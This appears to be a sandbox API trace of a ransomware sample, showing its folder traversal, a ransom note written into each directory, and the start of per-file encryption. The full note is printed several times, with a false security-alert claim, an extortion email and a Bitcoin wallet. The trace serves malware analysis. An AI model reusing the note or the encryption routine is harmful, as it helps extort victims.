HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\..") returned 68 [0089.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.946] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.946] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.946] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\RESTORE_FILES.txt") returned 83 [0089.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.947] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.947] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.948] lstrlenA (lpString="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") returned 684 [0089.948] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.948] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.948] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.948] CloseHandle (hObject=0xd8) returned 1 [0089.948] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="Windows") returned -1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files") returned -1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files (x86)") returned -1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="$Recycle.bin") returned 1 [0089.948] lstrcmpiW (lpString1="IMJP12", lpString2="System Volume Information") returned -1 [0089.948] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12") returned 66 [0089.948] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0089.948] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0089.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned 68 [0089.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.949] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.949] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.949] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.949] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.949] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\.") returned 68 [0089.949] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.949] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.949] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.949] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.949] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.949] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.949] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\..") returned 69 [0089.949] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.949] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.949] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.949] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.949] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\RESTORE_FILES.txt") returned 84 [0089.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.950] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.950] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.951] lstrlenA (lpString="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") returned 684 [0089.951] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.951] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.951] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.951] CloseHandle (hObject=0xd8) returned 1 [0089.952] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="Windows") returned -1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files") returned -1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files (x86)") returned -1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="$Recycle.bin") returned 1 [0089.952] lstrcmpiW (lpString1="IMJP8_1", lpString2="System Volume Information") returned -1 [0089.952] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned 67 [0089.952] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0089.952] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0089.952] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned 69 [0089.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.952] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.952] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.952] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.952] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.952] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\.") returned 69 [0089.953] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.953] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.953] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.953] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.953] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.953] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.953] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.953] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\..") returned 70 [0089.953] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.953] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.953] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.953] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt") returned 85 [0089.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xd8 [0089.954] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.954] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.954] lstrlenA (lpString="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") returned 684 [0089.954] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.955] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.955] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.955] CloseHandle (hObject=0xd8) returned 1 [0089.955] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="Windows") returned -1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files") returned -1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files (x86)") returned -1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="$Recycle.bin") returned 1 [0089.955] lstrcmpiW (lpString1="IMJP9_0", lpString2="System Volume Information") returned -1 [0089.955] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned 67 [0089.955] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0089.955] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0089.955] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned 69 [0089.955] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.955] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.956] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.956] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.956] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.956] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\.") returned 69 [0089.956] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.956] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.956] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.956] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.956] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.956] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.956] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\..") returned 70 [0089.956] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.956] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.956] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.956] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt") returned 85 [0089.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.957] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.957] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.957] lstrlenA (lpString="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") returned 684 [0089.957] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.958] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.958] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.958] CloseHandle (hObject=0xd8) returned 1 [0089.958] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0089.958] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 77 [0089.958] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0089.958] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0089.958] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned 79 [0089.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 
0x47ba50 [0089.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.958] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.958] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.958] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.958] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.") returned 79 [0089.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.958] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.958] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.958] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.958] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.959] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\..") returned 80 [0089.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.959] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="Windows") returned -1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files") returned 1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files (x86)") returned 1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="$Recycle.bin") returned 1 [0089.959] lstrcmpiW (lpString1="Quick 
Launch", lpString2="System Volume Information") returned -1 [0089.959] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 90 [0089.959] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0089.959] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0089.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned 92 [0089.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.959] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.959] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.959] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.959] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.959] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.") returned 92 [0089.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.959] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.959] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.959] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.959] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.959] CreateFileW 
